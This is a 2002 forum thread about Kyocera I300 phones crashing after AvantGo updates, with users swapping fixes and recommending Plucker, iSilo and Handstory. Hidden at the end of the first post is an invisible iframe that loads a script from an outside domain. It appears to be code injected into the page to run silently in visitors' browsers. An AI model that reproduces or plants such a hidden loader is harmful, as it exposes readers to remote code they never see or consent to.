+ Reply to Thread
Results 1 to 11 of 11
  1. #1
    Registered User
    Join Date
    11-22-2001
    Posts
    53

    New Avantgo Problematic?

    I have just witnessed my friend's and my I300s crashed badly -- both after updating channels in Avantgo. I think when you add/remove channels, Avantgo writes file to your device, and this file causes crashes that require hard-reset. Has anyone else noticed this problem, or is it just me finding excuses to buy myself the new Tungsten T?
    This is how it looks like -- you turn on your device, and all it does is flashing on and off. Soft-resets can't even turn the device off...<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

  2. #2
    Old School mjorange's Avatar
    Join Date
    11-07-2001
    Location
    San Rafael
    Posts
    2,254
    You may recall that that has been reported before. Not after synching, but when removing the battery while viewing AvantGo. I have been stuck there for hours before. I don't use AvantGo anymore so I'm not sure, but I doubt the problem will persist.

  3. #3
    Registered User
    Join Date
    11-22-2001
    Posts
    53
    Yea. I've read before that removing the battery or losing connection while in Avantgo can be disastrous. However, this is not the case. I'm talking specifically about AvantGo's new Wireless feature (which it claims to be 30% faster). It seems like the new feature has overwritten my network panel files. And on every restore, the same thing happens as I cannot identify specifically which while is doing it. My only hope now is that my home copy of backup doesn't contain this file...

  4. #4
    Registered User
    Join Date
    11-22-2001
    Posts
    53
    I found the problem. Avantgo added a conduit called "MAL_PRODUCT_NAME_ST" to my HotSync manager, and this conduit somehow modifies my I300 enough that it won't work unless it's completely wiped.
    The good news: Hardreset and the problem goes away.
    The bad news: the problem returns after restore.
    I've painfully reset and reinstall all apps individually just now. Took me a total of SIX HOURS!!

  5. #5
    Old School mjorange's Avatar
    Join Date
    11-07-2001
    Location
    San Rafael
    Posts
    2,254
    Been there brother. One of the few things I hate in this world. Can you delete that by itself?

  6. #6
    Registered User
    Join Date
    11-22-2001
    Posts
    53
    Wished so but apparently not. Some modifications are done to the device that it no longer sees Inet Libr, even though the file is still in my device ROM. This is very frustrating..

  7. #7
    Registered User
    Join Date
    01-18-2002
    Location
    Maryland
    Posts
    31

    No AvantGo - Try this

    Much less invasive and if you fiddle with it and dig for the handheld site names (such as http://www.metacritic.com/avantgo/), you can get a lot of the same AvantGo content.

    http://www.plkr.org/index.plkr

  8. #8
    Registered User garylapointe's Avatar
    Join Date
    11-06-2001
    Location
    Dearborn, MI, USA
    Posts
    379

    Re: No AvantGo - Try this

    Originally posted by jgermuga
    http://www.plkr.org/index.plkr
    I used to be a big plucker fan. The problem with it is it's (very) difficult to configure. More than most people want to deal with. It has a few GREAT features in the browser, but that even requires more configuration.

    I am now a huge fan of iSilo (http://www.isilo.com/). It's REALLY easy to set up (put in a URL and click!). Advance features (a few less than plucker, but more than avantgo) to include graphics, how many bits to convert to, dither or not, size (height/width) to shrink to, include or convert tables, include colors or not, levels, stay below URL, go off site, etc.

    I think you can try it free for a few weeks (or month?) and then it's $17.50 (well worth it). It's got a free mode but it really loses all the features. With a few semi-advanced steps (that you only have to do once) it can download sites when you want and then sync the next time you sync.

    It actually makes real web pages pretty useable (but still difficult). If you've got a ram card for your other palm (supports hires/hires+ too!), it'll push it stright to there. Mac or Windows.

    I still use AvantoGo too for sites I want updated everytime I sync (weather, traffic) and for the few sites that are AvantGo specific...

    Gary


    Handstory is pretty good too (www.handstory.com) but I've stuck with iSilo...
    Last edited by garylapointe; 11-04-2002 at 09:55 PM.

  9. #9
    Registered User garylapointe's Avatar
    Join Date
    11-06-2001
    Location
    Dearborn, MI, USA
    Posts
    379

    Plucker looking good!

    FYI: I mentioned above that I didn't like plucker because it was too hard to configure. That's changed!

    They've added a graphical interface (almost as good as iSilo) and most importantly it's free! (But only not for mac).

    They also added 320x320 support. It'll access a RAM card but doesn't want to push it there automatically very well...

    http://www.plkr.org/

    Gary

  10. #10
    Registered User
    Join Date
    01-18-2002
    Location
    Maryland
    Posts
    31
    Yes, plucker is much better. The original was a bit rough on those less techie, but I figure the people who are perusing this board are not faint of heart. In any case, the new GUI interface makes setting it up much easier, and the nice thin is you can have it pull your pages to your PC on an off peak time, rather than having to wait for the downlaods to occur when you run a hotsync.


    Handstory is nice too for just snipping pages on the fly. I think Plucker is supposed to do this too, but I haven't gotten it to work yet.

  11. #11
    Registered User
    Join Date
    11-07-2002
    Posts
    1
    I've been experiencing similar problems with my I300 - specifically the screen flashing, and then being offered the option of deleting all information (select the 'up' button). I'm a relatively new I300 user and have installed several palm applications to "try out" - among them avantgo. Until learning others were experiencing the same problem, I wasn't sure exactly which application was to blame. I've since deleted avantgo; and the "hard reset" crashes have stopped - but I am still having to soft reset from time to time. I've also noticed that when the phone is at rest, the screen will "come on" at regular intervals, my battery life is about HALF of what it used to be, the clock on the "phone screen" will stop - not match the clock on the palm desktop, my caller ID works half of the time. In general - everything seems to just be a little bit off-kelter!
    With the hard resets I would have thought I would be able to start back at "square one" - but evidently not. Any suggestions would be most welcome

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts